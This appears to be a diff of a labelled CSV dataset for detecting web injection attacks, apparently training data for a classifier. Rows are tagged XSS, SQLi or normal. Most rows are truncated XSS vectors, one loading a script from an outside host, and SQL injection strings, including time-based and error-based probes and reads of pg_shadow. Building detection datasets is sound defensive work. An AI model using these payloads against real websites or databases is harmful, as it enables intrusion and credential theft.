contenteditable>test</ta",1,XSS,2078 -1 ) ) as shmg where 1371 = 1371 union all select n,2,SQLi,15030 -"-6656"" ) union all select 3931#",2,SQLi,15676 -"1"" where 5440 = 5440 and 8189 = ( select count ( *",2,SQLi,14210 -"{""id"":null,""firstName"":""Grasyah"",""lastName"":""Santh",0,normal,27177 -1 ) as guru where 7615 = 7615 union all select nul,2,SQLi,18614 -1 where 9774 = 9774,2,SQLi,15217 -"-2717"" or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,19227 -<xmp id=x tabindex=1 onbeforeactivate=alert(1)></x,1,XSS,2538 -"1 ) where 4810 = 4810 union all select null,null#",2,SQLi,16579 -"-5904"" where 9782 = 9782 or 5903 = ( 'qqpjq'|| ( s",2,SQLi,16396 -"<mark oncopy=""alert(1)"" contenteditable>test</mark",1,XSS,7363 -<object id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6637 -<label id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,7499 -"1' procedure analyse ( extractvalue ( 5840,concat ",2,SQLi,13483 -"*{color:red}</style>//[""'`-->]]>]</div>",1,XSS,9010 -Choose from select frying skillets and casserole d,0,normal,26287 -1 ) ) waitfor delay '0:0:5'--,2,SQLi,20427 -"<nextid onkeydown=""alert(1)"" contenteditable>test<",1,XSS,6554 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10771 -end and ( ( 'vcaf' like 'vcaf,2,SQLi,16132 -<output onpointerover=alert(1)>XSS</output>,1,XSS,4655 +"<source oncut=""alert(1)"" contenteditable>test</sou",1,XSS,8638 +It Was Proposed By A Committee Of The British Asso,0,normal,25949 +1' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ,2,SQLi,22207 +<section id=x tabindex=1 onactivate=alert(1)></sec,1,XSS,3870 +"-2605"" ) or 4493 = utl_inaddr.get_host_address ( c",2,SQLi,22175 +"<a draggable=""true"" ondragleave=""alert(1)"">test</a",1,XSS,2079 +1 where 8114 = 8114 and 6510 = ( select count ( * ,2,SQLi,15032 +1 ) ) as zoso where 3633 = 3633,2,SQLi,15678 +-3496' ) ) or 9323 = 9323#,2,SQLi,14212 +"{""id"":null,""firstName"":""Khairul"",""lastName"":""Ashab",0,normal,27175 +-9484' or ( 7129 = 2349 ) *2349 and 'fcsa' like 'f,2,SQLi,18616 +"-1134 union all select 1297,1297,1297,1297,1297,12",2,SQLi,15219 +"-1922%' ) union all select 2335,2335,2335,2335,233",2,SQLi,19229 +"<ol onmouseover=""alert(1)"">test</ol>",1,XSS,2539 +"-4100' ) ) union all select 1163,1163,1163--",2,SQLi,16581 +select ( case when ( 3499 = 4209 ) then 3499 else ,2,SQLi,16398 +"<style>@keyframes x{}</style><a style=""animation-n",1,XSS,7365 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6639 +"<link draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,7501 +1' where 5004 = 5004 or 7552 = ( select count ( * ,2,SQLi,13485 +"<! '=""foo""><x foo='><img src=x onerror=alert(2)//'",1,XSS,9012 +Chu would select the next clue.,0,normal,26284 +"1"" ) ) or 7417 = ( select count ( * ) from sysibm.",2,SQLi,20429 +"<blockquote oncontextmenu=""alert(1)"">test</blockqu",1,XSS,6556 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10773 +"1"" ) ) as esho where 8864 = 8864 order by 1--",2,SQLi,16134 +"<html draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4657 """><img src=""x:x"" onerror=""alert(XSS)"">",1,XSS,321 -"<tbody onbeforecut=""alert(1)"" contenteditable>test",1,XSS,7136 -1 rlike ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,17756 -"select * from users where id = '1' union select "";",2,SQLi,11985 -"<style>@keyframes x{}</style><i style=""animation-n",1,XSS,2655 --5742' where 1314 = 1314 or 5903 = ( 'qqpjq'|| ( s,2,SQLi,12143 -"-1597"" union all select 6038,6038,6038,6038,6038,6",2,SQLi,13722 -1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,19783 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7138 +"1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71,",2,SQLi,17758 +select * from users where id = 1 + ( \ ) or 1 = 1 ,2,SQLi,11987 +"<fieldset onmousemove=""alert(1)"">test</fieldset>",1,XSS,2656 +"-4605"" ) union all select 8542,8542,8542,8542,8542",2,SQLi,12145 +1%' ) and 6240 = ( 'qqpjq'|| ( select case 6240 wh,2,SQLi,13724 +"1%"" ) ) and 7358 = 6986--",2,SQLi,19785 <iframe/src \/\/onload = prompt(1),1,XSS,887 -<datalist id=x tabindex=1 onfocus=alert(1)></datal,1,XSS,5003 -Show me where it's stored.,0,normal,23263 -The View Mother Wavelet option can be used to sele,0,normal,25359 -1' in boolean mode ) waitfor delay '0:0:5'--,2,SQLi,17311 +<button onpointerout=alert(1)>XSS</button>,1,XSS,5005 +Determine values where necessary.,0,normal,23260 +The writer therefore questioned the Guardians ' ab,0,normal,25356 +"-8888%' ) union all select 5312,5312,5312,5312,531",2,SQLi,17313 "<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>""\>",1,XSS,245 -"-2028' ) ) ) union all select 8698,8698,8698,8698#",2,SQLi,14759 -"<ruby onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,8208 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,16528 -"<base onmouseout=""alert(1)"">test</base>",1,XSS,5984 -<style>:target {transform: rotate(180deg);}</style,1,XSS,2364 -"-1859' union all select 1781,1781,1781,1781#",2,SQLi,16514 -"[<blockquote cite=""]"">["" onmouseover=""alert('RVRSH",1,XSS,1162 -"-7482"" ) ) ) or 9077 = 2651",2,SQLi,18292 -"{""id"":null,""name"":""worse""}",0,normal,27340 +"1"" ) where 4660 = 4660 or 5286 = ( select count ( ",2,SQLi,14761 +"<strong onmouseleave=""alert(1)"">test</strong>",1,XSS,8210 +-6397%' or 4493 = utl_inaddr.get_host_address ( ch,2,SQLi,16530 +"<main onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,5986 +<SCRIPT>alert('');</SCRIPT>,1,XSS,2365 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,16516 +%22;alert%28%27RVRSH3LL_XSS%29//,1,XSS,1163 +"-7848%"" union all select 1580,1580,1580,1580,1580,",2,SQLi,18294 +"{""id"":null,""name"":""vessels""}",0,normal,27339 "<TABLE BACKGROUND=""javascript:alert('XSS')"">",1,XSS,288 -1'|| ( select 'iocs' where 9287 = 9287 and 8407 = ,2,SQLi,13651 -"-1593' or elt ( 7044 = 6125,6125 ) and 'zkuz' = 'z",2,SQLi,21893 -1) or sleep(__TIME__)#,2,SQLi,10069 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--",2,SQLi,10681 -1' ) ) ) and char ( 107 ) ||char ( 121 ) ||char ( ,2,SQLi,12451 -Find data where available.,0,normal,23303 -"<acronym oncopy=""alert(1)"" contenteditable>test</a",1,XSS,8682 -"<IMG SRC=x onload=""alert(String.fromCharCode(88,83",1,XSS,1171 -"{""id"":null,""firstName"":""Manie"",""lastName"":""Villar""",0,normal,26884 -AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--,2,SQLi,10375 -Fortnite servers were really bad today/tonight. Be,0,normal,26499 --6341' or 5903 = ( 'qqpjq'|| ( select case 5903 wh,2,SQLi,21674 -<progress onpointerout=alert(1)>XSS</progress>,1,XSS,6793 -Up to 50% off select Lifesmart Hot Tubs and Massag,0,normal,25203 -1' ) ) as ewsw where 4667 = 4667 procedure analyse,2,SQLi,18244 +1' in boolean mode ) and 9660 = ( select count ( *,2,SQLi,13653 +"1"" ) as cfed where 8220 = 8220 union all select nu",2,SQLi,21891 +@var select @var as var into temp end --,2,SQLi,10071 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10683 +"1' ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( ch",2,SQLi,12453 +Calculate totals where applicable.,0,normal,23300 +<samp id=x tabindex=1 onfocus=alert(1)></samp>,1,XSS,8684 +"<IMG SRC=x onafterprint=""alert(String.fromCharCode",1,XSS,1172 +"Page down to the cookies section and select to "" e",0,normal,25791 +SLEEP(5)--,2,SQLi,10377 +Guys seriously start realizing league of legends i,0,normal,26496 +"-3437 ) union all select 7774,7774,7774--",2,SQLi,21672 +<img2 onpointerover=alert(1)>XSS</img2>,1,XSS,6795 +"Up tp 40% off select Fossil, Micheal Kors Watches ",0,normal,25200 +1' ) ) and sleep ( 5 ) and ( ( 'tcwt' = 'tcwt,2,SQLi,18246 "<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYL",1,XSS,278 -select current_setting('port');,2,SQLi,22506 -1' ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 7,2,SQLi,15947 -Sort the books.,0,normal,22830 -"<base onmouseleave=""alert(1)"">test</base>",1,XSS,3122 -"<menu onmousedown=""alert(1)"">test</menu>",1,XSS,8580 -"-8034"" ) where 1292 = 1292 union all select 1292,1",2,SQLi,17696 -"-5691' union all select 6610,6610#",2,SQLi,17417 -"<keygen ondblclick=""alert(1)"">test</keygen>",1,XSS,8340 -<isindex onpointerdown=alert(1)>XSS</isindex>,1,XSS,3407 -"-3361 where 1335 = 1335 or elt ( 5891 = 5092,5092 ",2,SQLi,15476 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13862 -Select resume.,0,normal,24589 -"-9845"" ) as xpis where 1936 = 1936 or 1 group by c",2,SQLi,13129 +select session_user;,2,SQLi,22503 +"1%"" ) ) ) and exp ( ~ ( select * from ( select con",2,SQLi,15949 +Create a drawing.,0,normal,22827 +"<figure onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,3123 +"<style>@keyframes x{}</style><legend style=""animat",1,XSS,8582 +"1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,17698 +"1"" ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ",2,SQLi,17419 +<style>:target {color: red;}</style><form id=x sty,1,XSS,8342 +<footer onfocusout=alert(1) tabindex=1 id=x></foot,1,XSS,3409 +"-5587%' ) or elt ( 1032 = 1032,3623 ) and ( '%' = ",2,SQLi,15478 +( select ( case when ( 3348 = 1710 ) then 3348 els,2,SQLi,13864 +Select end.,0,normal,24586 +-3497' order by 1#,2,SQLi,13131 "<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116",1,XSS,932 "<script src=""\\%(jscript)s""></script>",1,XSS,692 -Merge the financial records.,0,normal,22636 -"<menuitem onclick=""alert(1)"">test</menuitem>",1,XSS,6365 -"-7848%"" union all select 1580,1580,1580,1580,1580,",2,SQLi,18294 -"<![><img src=""]><img src=x onerror=alert(39)//"">",1,XSS,9022 -ORDER BY 1#,2,SQLi,10274 -"iif ( 1718 = 5436,1,1/0 )",2,SQLi,20951 -"{""id"":null,""firstName"":""Zoe"",""lastName"":""Chan"",""ad",0,normal,26865 -1 ) as nbno where 9816 = 9816 and 3754 = ( select ,2,SQLi,16429 -"1"" and exp ( ~ ( select * from ( select concat ( 0",2,SQLi,20324 -"<div id=""66""><?xml version=""1.0""?>",1,XSS,9142 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7109 -`'><script>\xE2\x80\x80javascript:alert(530)</scri,1,XSS,8976 -"<input onpaste=alert(1) value="""" autofocus>",1,XSS,4320 -<animatetransform onpointerout=alert(1)>XSS</anima,1,XSS,2966 -"<tr onmouseout=""alert(1)"">test</tr>",1,XSS,3970 -<style>:target {color:red;}</style><footer id=x st,1,XSS,4927 -select * from pg_shadow;,2,SQLi,22513 -"1"" and elt ( 4249 = 4249,7259 )",2,SQLi,14617 --9363%' or ( 8459 = 8459 ) *4906 and '%' = ',2,SQLi,13972 -1'|| ( select 'czos' from dual where 6814 = 6814,2,SQLi,20544 -"<dialog onmousemove=""alert(1)"">test</dialog>",1,XSS,3093 -1 where 9279 = 9279 or 7427 = dbms_pipe.receive_me,2,SQLi,21098 -"-8080"" ) as nlos where 8917 = 8917 union all selec",2,SQLi,12749 -"1"" ) where 2388 = 2388 union all select null,null,",2,SQLi,21702 --2806' ) ) ) or 2724 in ( ( char ( 113 ) +char ( 1,2,SQLi,15791 -"1"" ) where 9285 = 9285 and 8506 = 8343#",2,SQLi,12516 -<li onpointerout=alert(1)>XSS</li>,1,XSS,3983 -#ERROR!,2,SQLi,22530 -&lt;STYLE&gt;.XSS{background-image:url(&quot;javas,1,XSS,1405 -1' ) as tuhc where 4018 = 4018 or char ( 117 ) ||c,2,SQLi,19580 -"<svg onpaste=""alert(1)"" contenteditable>test</svg>",1,XSS,6125 -"&lt;IMG SRC=\""jav&#x0D;ascript&#058;alert('XSS');\",1,XSS,1095 -"1"" ) union all select null,null--",2,SQLi,17354 -1 ) or 9643 = ( select count ( * ) from domain.dom,2,SQLi,15973 -<style>:target {color: red;}</style><h1 id=x style,1,XSS,2844 -1' or 5356 = ( select count ( * ) from sysusers as,2,SQLi,19236 -"<big draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,4816 --2889 ) ) as iqzv where 1786 = 1786 union all sele,2,SQLi,16474 -<dir onpointerleave=alert(1)>XSS</dir>,1,XSS,5957 -Select switch.,0,normal,24757 -"-2296"" union all select 7359,7359,7359,7359,7359,7",2,SQLi,20856 -1 ) ) as cdhd where 2958 = 2958 or 5356 = ( select,2,SQLi,22341 -"1%"" and ( select * from ( select ( sleep ( 5 ) ) )",2,SQLi,13375 -Select your project.,0,normal,24849 -1%' ) ) or sleep ( 5 ) and ( ( '%' = ',2,SQLi,18174 -VITAMIN E RAISES PROSTATE CANCER RISK: THE select ,0,normal,25183 -"-8038' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'xf",2,SQLi,18444 -"1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,13180 -1'+ ( select 'vedi' where 2774 = 2774 and 9660 = (,2,SQLi,21872 -"1"" ) where 2136 = 2136 or 7552 = ( select count ( ",2,SQLi,12206 -"1"" waitfor delay '0:0:5'",2,SQLi,18287 --1168 ) ) as vlol where 3475 = 3475 or 1 group by ,2,SQLi,14408 -"<time onmouseleave=""alert(1)"">test</time>",1,XSS,4687 -1' and 2716 = ( select count ( * ) from sysusers a,2,SQLi,18715 -<input4 onpointerleave=alert(1)>XSS</input4>,1,XSS,4923 -"1"" ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ",2,SQLi,15834 -"<output oncontextmenu=""alert(1)"">test</output>",1,XSS,6786 -"<style>@keyframes slidein {}</style><kbd style=""an",1,XSS,5878 -"--></script></title></style>""/</textarea><a' oncli",1,XSS,9549 -"1' or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,16460 -"<style>@keyframes x{}</style><head style=""animatio",1,XSS,2346 -<content onpointermove=alert(1)>XSS</content>,1,XSS,8431 -<h1 onfocusout=alert(1) tabindex=1 id=x></h1><inpu,1,XSS,4587 -"Select ""Sort left to right"" to alphabetize by row ",0,normal,25670 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,14598 -"{""id"":null,""firstName"":""Lalyn"",""lastName"":""Astorga",0,normal,27105 -1' ) as irsh where 4973 = 4973 or 7552 = ( select ,2,SQLi,22215 -"<wbr oncopy=""alert(1)"" contenteditable>test</wbr>",1,XSS,8379 -Select your decide.,0,normal,25001 -"1"" and ( 7424 = 2381 ) *2381 and ""dvju"" = ""dvju",2,SQLi,17938 -Today it's available as an optional topping at sel,0,normal,25241 -"<hgroup oncontextmenu=""alert(1)"">test</hgroup>",1,XSS,6198 -1' and ( select 2* ( if ( ( select * from ( select,2,SQLi,13098 -1' ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ,2,SQLi,14457 -1'|| ( select 'txyy' where 6500 = 6500 procedure a,2,SQLi,15180 -<output onfocusout=alert(1) tabindex=1 id=x></outp,1,XSS,6402 -<style>:target {color:red;}</style><template id=x ,1,XSS,5696 -"<audio draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,2942 -Plant a fragrant rose.,0,normal,22585 -1,0,normal,26717 -"<style>@keyframes slidein {}</style><var style=""an",1,XSS,7382 -Select your business.,0,normal,24860 -"-1512"" union all select 9688,9688,9688,9688,9688,9",2,SQLi,18005 -"select * from generate_series ( 9709,9709,case whe",2,SQLi,13835 -"<dd draggable=""true"" ondragend=""alert(1)"">test</dd",1,XSS,5579 -IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-,2,SQLi,10339 -") or 1""=""1""--",2,SQLi,9994 -<style>:target {color: red;}</style><keygen id=x s,1,XSS,7906 -Specify filters where applicable.,0,normal,23247 -Universal Studios Hollywood Halloween Horror Night,0,normal,25223 -"&lt;A HREF=\""http&#58;//66&#46;102&#46;7&#46;147/\",1,XSS,1049 -<template onpointerleave=alert(1)>XSS</template>,1,XSS,6783 -1'|| ( select 'hvqw' from dual where 4423 = 4423 u,2,SQLi,12663 -Just select the length (up to 99 measures) and pla,0,normal,25925 -Join the virtual meeting.,0,normal,22654 -"<;EMBED SRC="";http://ha.ckers.org/xss.swf""; AllowS",1,XSS,1610 -"-4121%"" ) union all select 2659,2659,2659,2659,265",2,SQLi,19481 -<style onpointerleave=alert(1)>XSS</style>,1,XSS,2416 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2018 -"<rt onclick=""alert(1)"">test</rt>",1,XSS,2972 -"1"" or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,12318 -"1"" ) where 4822 = 4822 union all select null,null,",2,SQLi,14039 -"1%"" ) ) or exp ( ~ ( select * from ( select concat",2,SQLi,13568 -<address onfocusout=alert(1) tabindex=1 id=x></add,1,XSS,2932 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,15407 -To fill vacancies parliament must name six persons,0,normal,25268 -"-3438"" ) or 1570 = convert ( int, ( select char ( ",2,SQLi,19631 -if ( 2695 = 9045 ) select 2695 else drop function ,2,SQLi,16509 -1 ) and 5196 = 9002,2,SQLi,17491 -1'+ ( select sfuq where 8094 = 8094 procedure anal,2,SQLi,13002 -"<select draggable=""true"" ondrag=""alert(1)"">test</s",1,XSS,1815 -"1%"" ) or 1022 = ( select count ( * ) from all_user",2,SQLi,14587 -"-5062"" ) ) ) or ( 1069 = 8974 ) *8974 and ( ( ( ""h",2,SQLi,14449 -"""(F)for purposes of this Motion only, the Select C",0,normal,26464 -select * from users where id = '1' + @ 1 union sel,2,SQLi,11534 -"<style>@keyframes x{}</style><pre style=""animation",1,XSS,2124 -1' in boolean mode ) and 3715 in ( ( char ( 113 ) ,2,SQLi,13705 -"{""id"":null,""name"":""tank""}",0,normal,27557 -"{""id"":null,""firstName"":""Eve"",""lastName"":""Ang"",""spe",0,normal,27163 -"{""id"":null,""name"":""typical""}",0,normal,26944 --8836%' ) or 4856 = 3891,2,SQLi,18582 -"1"" or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,20436 --6179 ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,17601 -<command onpointermove=alert(1)>XSS</command>,1,XSS,7702 -Select your impact.,0,normal,24875 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,17110 -1%' ) or 8315 = ( select count ( * ) from sysibm.s,2,SQLi,21982 -"<foreignObject xlink:href=""data:text/xml,%3Cscript",1,XSS,9171 +Select the perfect angle for the photo.,0,normal,24007 +"<dialog onpaste=""alert(1)"" contenteditable>test</d",1,XSS,6367 +-8716' ) where 5523 = 5523 or 3686 = 8485--,2,SQLi,18296 +"<% foo><x foo=""%><script>alert(91)</script>"">//[""'",1,XSS,9024 +ORDER BY 3#,2,SQLi,10276 +1 or 1022 = ( select count ( * ) from all_users t1,2,SQLi,20953 +"{""id"":null,""firstName"":""Jacob"",""lastName"":""Boe"",""a",0,normal,26862 +"1%' ) and row ( 6237,7469 ) > ( select count ( * )",2,SQLi,16431 +select pg_sleep ( 5 ) and ( ( '%' = ',2,SQLi,20326 +"<div id=""68""><doc xmlns:xlink=""http://www.w3.org/1",1,XSS,9144 +"<rt draggable=""true"" ondrag=""alert(1)"">test</rt>",1,XSS,7111 +`'><script>\xE2\x80\x83javascript:alert(527)</scri,1,XSS,8978 +<svg id=x onfocusin=alert(1)>,1,XSS,4322 +<style>:target {color:red;}</style><bdi id=x style,1,XSS,2967 +<listing onpointerleave=alert(1)>XSS</listing>,1,XSS,3972 +"<section onkeypress=""alert(1)"" contenteditable>tes",1,XSS,4929 +select current_setting('config_file');,2,SQLi,22510 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,14619 +"-4542 union all select 1249,1249,1249,1249,1249,12",2,SQLi,13974 +"1"" ) ) ) and 5556 = ( select count ( * ) from all_",2,SQLi,20546 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3094 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21100 +select pg_sleep ( 5 ) and ( ( ( 'xobx' = 'xobx,2,SQLi,12751 +1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) #,2,SQLi,21700 +"1' where 4272 = 4272 union all select null,null,nu",2,SQLi,15793 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12518 +"<aside onmouseenter=""alert(1)"">test</aside>",1,XSS,3985 +#ERROR!,2,SQLi,22527 +&lt;STYLE type=&quot;text/css&quot;&gt;BODY{backgr,1,XSS,1406 +1' where 8430 = 8430 or 7417 = ( select count ( * ,2,SQLi,19582 +"<dir ondblclick=""alert(1)"">test</dir>",1,XSS,6127 +"&lt;IMG SRC=\""jav&#x0A;ascript&#058;alert('XSS');\",1,XSS,1096 +1' ) as woka where 4316 = 4316 and 5556 = ( select,2,SQLi,17356 +"1"" union all select null,null,null,null,null,null-",2,SQLi,15975 +<ul onpointerleave=alert(1)>XSS</ul>,1,XSS,2845 +"-7306"" or 2081 = 6847",2,SQLi,19238 +<output onpointerenter=alert(1)>XSS</output>,1,XSS,4818 +"1',updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( ",2,SQLi,16476 +<image2 onpointerup=alert(1)>XSS</image2>,1,XSS,5959 +Select transport.,0,normal,24754 +"1"" ) as bllz where 6975 = 6975 and 8148 = like ( '",2,SQLi,20858 +1' ) ) as yyrx where 5600 = 5600,2,SQLi,22339 +"-8026 or elt ( 8434 = 4516,4516 ) # bsqo",2,SQLi,13377 +Select the music.,0,normal,24815 +"1"" ) and 2954 = 1256--",2,SQLi,18176 +"Wagers, meanwhile, was helping Chief O'Toole to se",0,normal,25180 +1'|| ( select 'xyrk' from dual where 9844 = 9844 a,2,SQLi,18446 +"1"" ) ) as fjtv where 8904 = 8904",2,SQLi,13182 +1' ) as irck where 3660 = 3660 or ( select * from ,2,SQLi,21870 +1%' ) or ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,12208 +1 ) ) ) or 2633 = dbms_pipe.receive_message ( chr ,2,SQLi,18289 +select ( case when ( 3681 = 5989 ) then 3681 else ,2,SQLi,14410 +<dfn onpointerleave=alert(1)>XSS</dfn>,1,XSS,4689 +"1"" ) as xwnu where 6490 = 6490 union all select nu",2,SQLi,18717 +"<isindex oncontextmenu=""alert(1)"">test</isindex>",1,XSS,4925 +"1"" ) as bpmk where 6412 = 6412 union all select nu",2,SQLi,15836 +<nextid onpointerup=alert(1)>XSS</nextid>,1,XSS,6788 +"<sub ondblclick=""alert(1)"">test</sub>",1,XSS,5880 +javascript://--></title></style></textarea></scrip,1,XSS,9551 +"1 and ( select 9067 from ( select count ( * ) ,con",2,SQLi,16462 +"<svg draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,2347 +"<abbr onmousedown=""alert(1)"">test</abbr>",1,XSS,8433 +<header onfocusout=alert(1) tabindex=1 id=x></head,1,XSS,4589 +Select the ideal solution.,0,normal,24280 +"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,14600 +"{""id"":null,""firstName"":""Tony"",""lastName"":""Wang"",""a",0,normal,27103 +"1 ) ) ) and updatexml ( 3393,concat ( 0x2e,0x71717",2,SQLi,22213 +"<u draggable=""true"" ondragstart=""alert(1)"">test</u",1,XSS,8381 +Select your authenticate.,0,normal,24998 +"1"" ) ) as paep where 8947 = 8947 and ( select 9067",2,SQLi,17940 +Top school systems select and educate their teachi,0,normal,25238 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6200 +"1"" or 6793 = ( select 6793 from pg_sleep ( 5 ) )",2,SQLi,13100 +1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,14459 +1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,15182 +"<time ondblclick=""alert(1)"">test</time>",1,XSS,6404 +<animate onpointerup=alert(1)>XSS</animate>,1,XSS,5698 +<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb,1,XSS,2943 +Order a fresh salad.,0,normal,22582 +1,0,normal,26714 +<style>:target {color: red;}</style><html id=x sty,1,XSS,7384 +Select your profession.,0,normal,24857 +1 ) where 5378 = 5378 and ( select 2* ( if ( ( sel,2,SQLi,18007 +"-4926"" where 8152 = 8152 or 4339 = 5547#",2,SQLi,13837 +"<map onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5581 +%' AND 8310=8311 AND '%'=',2,SQLi,10341 +") or 1""=""1""#",2,SQLi,9996 +"<title onpaste=""alert(1)"" contenteditable>test</ti",1,XSS,7908 +Find data where possible.,0,normal,23244 +"-1504"" ) as wpes where 6256 = 6256 union all selec",2,SQLi,22441 +"&lt;A HREF=\""http&#58;//%77%77%77%2E%67%6F%6F%67%6",1,XSS,1050 +"<applet onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,6785 +1' ) as lewd where 3118 = 3118 order by 1--,2,SQLi,12665 +Keep one thing in mind for whichever method you se,0,normal,25922 +Plant a blooming flower.,0,normal,22651 +"a="";get"";;&;#10;b="";URL("";"";;&;#10;c="";javascript:",1,XSS,1611 +"-5957 ) ) ) union all select 8485,8485,8485,8485,8",2,SQLi,19483 +<embed id=x onfocusin=alert(1) type=text/html>,1,XSS,2417 +"<b onmouseout=""alert(1)"">test</b>",1,XSS,2019 +"<script draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2973 +"1%' ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,12320 +"1' ) ) union all select null,null,null,null,null--",2,SQLi,14041 +1 ) ) as gygm where 4024 = 4024,2,SQLi,13570 +<time id=x tabindex=1 onfocusin=alert(1)></time>,1,XSS,2933 +-6548 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,15409 +"To make a return, Amazon customers select the prod",0,normal,25265 +1%' ) ) rlike ( select * from ( select ( sleep ( 5,2,SQLi,19633 +1 ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||c,2,SQLi,16511 +-4713' ) ) ) or 4567 = 1287,2,SQLi,17493 +( case when 2646 = 8520 then 2646 else null end ),2,SQLi,13004 +"<a onmouseup=""alert(1)"">test</a>",1,XSS,1816 +select ( case when ( 5768 = 9169 ) then 5768 else ,2,SQLi,14589 +"1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,14451 +"""For Sama"" is released in select cinemas on Septem",0,normal,26461 +"select * from users where id = 1 or "";1"" or 1 = 1 ",2,SQLi,11536 +<input onpointerup=alert(1)>XSS</input>,1,XSS,2125 +select case when 3920 = 4402 then 1 else null end-,2,SQLi,13707 +Where's your SQL project?,0,normal,23423 +"{""id"":null,""name"":""sang spent rather paint""}",0,normal,27161 +"{""id"":null,""firstName"":""Hoe"",""lastName"":""Siew Lan""",0,normal,26941 +1%' ) ) or 2633 = dbms_pipe.receive_message ( chr ,2,SQLi,18584 +1' ) where 2227 = 2227,2,SQLi,20438 +1' ) ) as lrnh where 8569 = 8569 union all select ,2,SQLi,17603 +"<video draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,7704 +Select the right tools for the job.,0,normal,24239 +1%' and 2716 = ( select count ( * ) from sysusers ,2,SQLi,17112 +-2364'+ ( select 'qdut' where 7560 = 7560 union al,2,SQLi,21980 +<form action=javascript:alert(1)><input type=submi,1,XSS,9173 "<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>",1,XSS,809 -1'|| ( select 'bhxx' where 2585 = 2585,2,SQLi,22247 -1' ) ) and exp ( ~ ( select * from ( select concat,2,SQLi,21439 -"1"" ) ) ) and exp ( ~ ( select * from ( select conc",2,SQLi,21843 -where,0,normal,23105 -"<abbr onmousemove=""alert(1)"">test</abbr>",1,XSS,4907 -<content onblur=alert(1) tabindex=1 id=x></content,1,XSS,3723 -can I select,0,normal,26294 -1' and 3707 = ( select count ( * ) from sysibm.sys,2,SQLi,13123 -"1 ) where 1443 = 1443 union all select null,null,n",2,SQLi,12735 -<tt onpointermove=alert(1)>XSS</tt>,1,XSS,3963 -Select the best wedding cake flavor.,0,normal,24392 -"<main onmouseleave=""alert(1)"">test</main>",1,XSS,2672 -"1"" ) and make_set ( 8403 = 8403,8899 ) and ( ""dhss",2,SQLi,22071 -[notmalicious](javascript:window.onerror=alert;thr,1,XSS,9418 -1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,18149 -<style>:target {color: red;}</style><frame id=x st,1,XSS,4553 -1 ) ) ) or 2367 = ( select count ( * ) from rdb$fi,2,SQLi,16992 -"<nobr onmouseout=""alert(1)"">test</nobr>",1,XSS,6010 -"1%"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash (",2,SQLi,17832 -1'|| ( select 'eamo' where 4958 = 4958 and 